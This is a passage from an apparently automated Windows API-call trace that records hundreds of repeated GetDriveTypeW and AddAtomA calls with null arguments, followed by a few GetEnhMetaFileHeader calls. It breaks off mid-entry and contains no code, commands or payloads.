(lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA 
(lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA 
(lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA 
(lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.891] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 